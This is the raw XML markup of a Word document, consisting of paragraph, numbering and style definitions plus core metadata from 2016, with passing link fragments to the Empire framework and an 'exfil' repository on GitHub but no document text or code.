    <w:p w:rsidR="00533BBF" w:rsidRPr="00533BBF" w:rsidRDefault="00533BBF" w:rsidP="00533BBF"/>
    <w:p w:rsidR="00533BBF" w:rsidRPr="00533BBF" w:rsidRDefault="00533BBF" w:rsidP="00533BBF"/>
    <w:p w:rsidR="00533BBF" w:rsidRPr="00087FB6" w:rsidRDefault="00533BBF" w:rsidP="00533BBF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00533BBF" w:rsidRPr="00087F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925F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E9863BE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9186219"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="357A167C"/>
    <w:lvl w:ilvl="0" w:tplc="7ECCF3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5A1B5D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C8029920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2F6"/>
    <w:rsid w:val="00087FB6"/>
    <w:rsid w:val="00097BB9"/>
    <w:rsid w:val="000D53E8"/>
    <w:rsid w:val="000F1DE0"/>
    <w:rsid w:val="001C3706"/>
    <w:rsid w:val="001F7306"/>
    <w:rsid w:val="00216EF4"/>
    <w:rsid w:val="00223AF5"/>
    <w:rsid w:val="0031227A"/>
    <w:rsid w:val="00317484"/>
    <w:rsid w:val="003604D3"/>
    <w:rsid w:val="0037500C"/>
    <w:rsid w:val="00397C3E"/>
    <w:rsid w:val="00480D17"/>
    <w:rsid w:val="004B08EC"/>
    <w:rsid w:val="005132F6"/>
    <w:rsid w:val="00531ABE"/>
    <w:rsid w:val="00533BBF"/>
    <w:rsid w:val="005F70A6"/>
    <w:rsid w:val="006443E8"/>
    <w:rsid w:val="007328CB"/>
    <w:rsid w:val="00751E5F"/>
    <w:rsid w:val="00767CB3"/>
    <w:rsid w:val="007D1FC2"/>
    <w:rsid w:val="008638E4"/>
    <w:rsid w:val="008960A2"/>
    <w:rsid w:val="008F002C"/>
    <w:rsid w:val="00901EB5"/>
    <w:rsid w:val="00957E2A"/>
    <w:rsid w:val="00971909"/>
    <w:rsid w:val="009A5C71"/>
    <w:rsid w:val="009C6690"/>
    <w:rsid w:val="00A343C8"/>
    <w:rsid w:val="00A47876"/>
    <w:rsid w:val="00B023A9"/>
    <w:rsid w:val="00B073BF"/>
    <w:rsid w:val="00B43A85"/>
    <w:rsid w:val="00BE0AF5"/>
    <w:rsid w:val="00C12564"/>
    <w:rsid w:val="00C43AF4"/>
    <w:rsid w:val="00C96D20"/>
    <w:rsid w:val="00CB3618"/>
    <w:rsid w:val="00D573C3"/>
    <w:rsid w:val="00D9269D"/>
    <w:rsid w:val="00DE2DE8"/>
    <w:rsid w:val="00E03F93"/>
    <w:rsid w:val="00E90CFA"/>
    <w:rsid w:val="00EF7FC9"/>
    <w:rsid w:val="00FA07E6"/>
    <w:rsid w:val="00FB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BB14A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{78F5D71F-6675-44F5-A0FF-040F62861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343C8"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading10">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00A343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A343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de">
    <w:name w:val="Code"/>
    <w:link w:val="CodeChar"/>
    <w:qFormat/>
    <w:rsid w:val="00A343C8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EEEEEE"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
      <w:noProof/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CodeChar">
    <w:name w:val="Code Char"/>
    <w:link w:val="Code"/>
    <w:rsid w:val="00A343C8"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
      <w:noProof/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
      <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A343C8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343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3C8"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading10"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00A343C8"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Heading1">
    <w:name w:val="Heading1"/>
    <w:basedOn w:val="ListParagraph"/>
    <w:link w:val="Heading1Char0"/>
    <w:qFormat/>
    <w:rsid w:val="00A343C8"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="heading2">
    <w:name w:val="heading2"/>
    <w:basedOn w:val="ListParagraph"/>
    <w:link w:val="heading2Char"/>
    <w:qFormat/>
    <w:rsid w:val="00A343C8"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="3"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:b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343C8"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char0">
    <w:name w:val="Heading1 Char"/>
    <w:basedOn w:val="ListParagraphChar"/>
    <w:link w:val="Heading1"/>
    <w:rsid w:val="00A343C8"/>
    <w:rPr>
      <w:b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343C8"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="heading2Char">
    <w:name w:val="heading2 Char"/>
    <w:basedOn w:val="ListParagraphChar"/>
    <w:link w:val="heading2"/>
    <w:rsid w:val="00A343C8"/>
    <w:rPr>
      <w:b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343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343C8"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="heading3">
    <w:name w:val="heading3"/>
    <w:basedOn w:val="ListParagraph"/>
    <w:link w:val="heading3Char"/>
    <w:qFormat/>
    <w:rsid w:val="00A343C8"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="heading4">
    <w:name w:val="heading4"/>
    <w:basedOn w:val="ListParagraph"/>
    <w:link w:val="heading4Char"/>
    <w:qFormat/>
    <w:rsid w:val="00A343C8"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="3"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="heading3Char">
    <w:name w:val="heading3 Char"/>
    <w:basedOn w:val="ListParagraphChar"/>
    <w:link w:val="heading3"/>
    <w:rsid w:val="00A343C8"/>
    <w:rPr>
      <w:b/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="heading4Char">
    <w:name w:val="heading4 Char"/>
    <w:basedOn w:val="ListParagraphChar"/>
    <w:link w:val="heading4"/>
    <w:rsid w:val="00A343C8"/>
    <w:rPr>
      <w:b/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A34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A343C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343C8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3C8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-c1">
    <w:name w:val="pl-c1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A343C8"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-k">
    <w:name w:val="pl-k"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A343C8"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pln">
    <w:name w:val="pln"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A343C8"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pun">
    <w:name w:val="pun"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A343C8"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="str">
    <w:name w:val="str"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A343C8"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="com">
    <w:name w:val="com"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A34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DeJBe6eqp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github.com/adaptivethreat/Empire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daptivethreat/Empire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nnh100/exfil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57C2F-C851-49C9-97E2-48E990D0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test</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nga Hoang</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-11-22T10:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-11-22T10:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>